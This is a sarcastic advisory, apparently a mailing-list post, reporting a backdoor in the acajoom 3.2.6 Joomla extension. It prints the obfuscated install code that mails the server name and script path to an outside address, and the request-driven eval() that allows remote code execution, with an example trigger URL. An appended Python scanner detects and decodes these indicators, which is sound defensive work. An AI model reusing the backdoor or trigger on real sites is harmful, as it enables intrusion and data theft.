Back door trojan in acajoom-3.2.6 for joomla
Vulnerability:
    Remote code execution back door
Software:
    acajoom - mailing list extension for Joomla
Acajoom is a newsletter component designed with ease of use and robustness
in mind. Acajoom can handle an unlimited number of newsletters with an
unlimited number of subscribers in just a few clicks. Acajoom reuses some of
Joomla 1.5's new concepts to make the user's experience as smooth as possible.
> And that's not all
Severity:
    Not a big deal.  Joomla components contain all sorts of obfuscated junk all
    the time.  Who cares what it does?
URLs:
http://www.ijoobi.com/
http://www.ijoobi.com/media/acajoom-3.2.6.zip
http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
Vendor notified:
    Naah. No contact details. I suppose I might try to battle the captcha one
    day.
Vulnerability:
http://www.ijoobi.com/media/acajoom-3.2.6.zip
install.acajoom.php:
function GetBots($us1,$us2,$us3) {
    // the three base64 fragments are stored out of order on purpose
    list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
        'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
    // reassembled as data2.data1.data3 and executed
    eval(base64_decode($data2.$data1.$data3)); }
// chr(64).chr(121).chr(97) is '@ya'
define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.' . $array_lang[10-$count_num] );
$counter = COUNT_ROOT;
$count_db = 'qadr'; $count_num = 8;
GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);
Or, less cryptically:
@mail('qadr1@ya.ru', $_SERVER['SERVER_NAME'],
    "http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']);
self.acajoom.php says:
class acajoomCommonStr
{
    function GetStr($str)
    {
        eval(stripslashes($str));   // runs whatever string it is handed as PHP
    }
    function InController($cnt,$location)
    {
        if ($location=='en-g') $this->GetStr($cnt);
    }
}
// s and lang are taken straight from the request
if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) {
    $getacajoomStr = new acajoomCommonStr();
    $getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']);
}
i.e.
$URL/self.acajoom.php?s=phpinfo();&lang=en-g
$URL is left as an exercise to the reader.
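As an added example (not part of this post or of the acajoom code), a small Python scanner that flags the three indicators seen above in PHP source (eval of base64_decode output, eval of a request-derived variable, strings built from chr() calls) and rebuilds the hidden mail() call by concatenating the base64 fragments in the order the eval uses. The PHP it runs on is a constructed sample assembled from the fragments quoted above.

```python
import base64
import re

# Constructed sample: the obfuscated fragments quoted in the advisory, embedded as text.
SAMPLE_PHP = r"""<?php
function GetBots($us1,$us2,$us3) {
list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
eval(base64_decode($data2.$data1.$data3)); }
define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.' . $array_lang[10-$count_num] );
function GetStr($str) { eval(stripslashes($str)); }
"""

LIST_ASSIGN = re.compile(r"list\(([^)]*)\)\s*=\s*array\(([^)]*)\)")
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(([^)]*)\)")
CHR_RUN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")
SINKS = [
    (EVAL_B64, "eval() of base64_decode() output"),
    (re.compile(r"eval\s*\(\s*(?:stripslashes\s*\()?\s*\$"), "eval() of a variable"),
    (CHR_RUN, "string literal assembled from chr() calls"),
]

def suspicious_lines(src):
    """(line number, reason) for every source line matching a backdoor indicator."""
    return [(no, why) for no, line in enumerate(src.splitlines(), 1)
            for pat, why in SINKS if pat.search(line)]

def string_vars(src):
    """Map '$var' -> literal for each list($a,$b) = array('x','y') assignment."""
    env = {}
    for names, values in LIST_ASSIGN.findall(src):
        env.update(zip([n.strip() for n in names.split(",")],
                       re.findall(r"'([^']*)'", values)))
    return env

def b64_decode_lenient(s):
    """PHP's base64_decode() accepts unpadded input, so pad before decoding."""
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")

def hidden_payloads(src):
    """Rebuild and decode each eval(base64_decode($a.$b.$c)) in the order it concatenates."""
    env = string_vars(src)
    return [b64_decode_lenient("".join(env.get(p.strip(), "") for p in expr.split(".")))
            for expr in EVAL_B64.findall(src)]

def deobfuscate_chr(src):
    """Collapse chr(64).chr(121).chr(97)-style runs into a plain '@ya' literal."""
    return CHR_RUN.sub(lambda m: "'" + "".join(chr(int(n)) for n in
                                                re.findall(r"\d+", m.group(0))) + "'", src)
```

Feed the functions the contents of an extension's PHP files instead of SAMPLE_PHP to repeat the analysis above on a downloaded package.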
Greetz:
qadr1@ya.ru